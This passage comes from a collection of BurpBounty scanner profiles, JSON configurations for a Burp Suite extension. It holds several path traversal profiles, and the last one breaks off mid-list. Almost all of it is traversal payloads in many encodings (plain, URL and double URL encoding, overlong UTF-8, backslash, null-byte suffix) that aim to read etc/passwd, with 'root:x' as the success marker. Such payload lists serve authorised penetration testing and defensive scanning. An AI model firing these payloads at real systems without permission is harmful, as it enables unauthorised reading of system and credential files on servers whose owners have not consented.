"true,../..//../..//../..//../..//{FILE}",
"true,../..//../..//../..//../..///{FILE}",
"true,../{FILE}",
"true,../../{FILE}",
"true,../../../{FILE}",
"true,../../../../{FILE}",
"true,../../../../../{FILE}",
"true,../../../../../../{FILE}",
"true,../../../../../../../{FILE}",
"true,../../../../../../../../{FILE}",
"true,../{FILE}%00.png",
"true,../../{FILE}%00.png",
"true,../../../{FILE}%00.png",
"true,../../../../{FILE}%00.png",
"true,../../../../../{FILE}%00.png",
"true,../../../../../../{FILE}%00.png",
"true,../../../../../../../{FILE}%00.png",
"true,../../../../../../../../{FILE}%00.png",
"true,....//{FILE}",
"true,....//....//{FILE}",
"true,....//....//....//{FILE}",
"true,....//....//....//....//{FILE}",
"true,....//....//....//....//....//{FILE}",
"true,....//....//....//....//....//....//{FILE}",
"true,....//....//....//....//....//....//....//{FILE}",
"true,....//....//....//....//....//....//....//....//{FILE}",
"true,....//....//....//....//....//....//....//....//....//{FILE}",
"true,....%2F%2F{FILE}",
"true,....%2F%2F....%2F%2F{FILE}",
"true,....%2F%2F....%2F%2F....%2F%2F{FILE}",
"true,....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}",
"true,....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}",
"true,....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}",
"true,....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}",
"true,....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}",
"true,....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}",
"true,..%2f{FILE}",
"true,..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%252f{FILE}",
"true,..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%%32%66{FILE}",
"true,..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
"true,%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}"
],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,root:x"
],
"Tags": [
"PathTraversal",
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 1,
"Scope": 0,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 1,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "Linux-Path",
"IssueSeverity": "High",
"IssueConfidence": "Certain",
"IssueDetail": "Path traversal with payloads: \u003cbr\u003e \u003cpayload\u003e",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [
{
"type": "Payload",
"match": "{FILE}",
"replace": "etc/passwd",
"regex": "String"
}
],
"VariationAttributes": [],
"InsertionPointType": [
0
],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/Linux-PathTraversal-MR.bb | [
{
"ProfileName": "Linux-PathTraversal-MR",
"Name": "",
"Enabled": true,
"Scanner": 1,
"Author": "@egarme",
"Payloads": [
"true,/../{FILE}",
"true,/../../{FILE}",
"true,/../../../{FILE}",
"true,/../../../../{FILE}",
"true,/../../../../../{FILE}",
"true,/../../../../../../{FILE}",
"true,/../../../../../../../{FILE}",
"true,/../../../../../../../../{FILE}",
"true,/..%2f{FILE}",
"true,/..%2f..%2f{FILE}",
"true,/..%2f..%2f..%2f{FILE}",
"true,/..%2f..%2f..%2f..%2f{FILE}",
"true,/..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,/..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,/..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}"
],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,root:x"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 1,
"Scope": 0,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 1,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "Linux-PathTraversal",
"IssueSeverity": "Medium",
"IssueConfidence": "Certain",
"IssueDetail": "Path traversal with payloads: \u003cbr\u003e \u003cpayload\u003e",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [
{
"type": "Payload",
"match": "{FILE}",
"replace": "etc/passwd",
"regex": "String"
}
],
"VariationAttributes": [],
"InsertionPointType": [
65
],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/Linux-php.ini.bb | [
{
"ProfileName": "Linux-php.ini",
"Name": "",
"Enabled": true,
"Scanner": 1,
"Author": "@Sy3Omda",
"Payloads": [
"true,../{FILE}",
"true,../../{FILE}",
"true,../../../{FILE}",
"true,../../../../{FILE}",
"true,../../../../../{FILE}",
"true,../../../../../../{FILE}",
"true,../../../../../../../{FILE}",
"true,../../../../../../../../{FILE}",
"true,..%2f{FILE}",
"true,..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,..%252f{FILE}",
"true,..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,..\\{FILE}",
"true,..\\..\\{FILE}",
"true,..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..%255c{FILE}",
"true,..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,..%c0%af{FILE}",
"true,..%c0%af..%c0%af{FILE}",
"true,..%c0%af..%c0%af..%c0%af{FILE}",
"true,..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
"true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
"true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
"true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
"true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
"true,%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
"true,%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
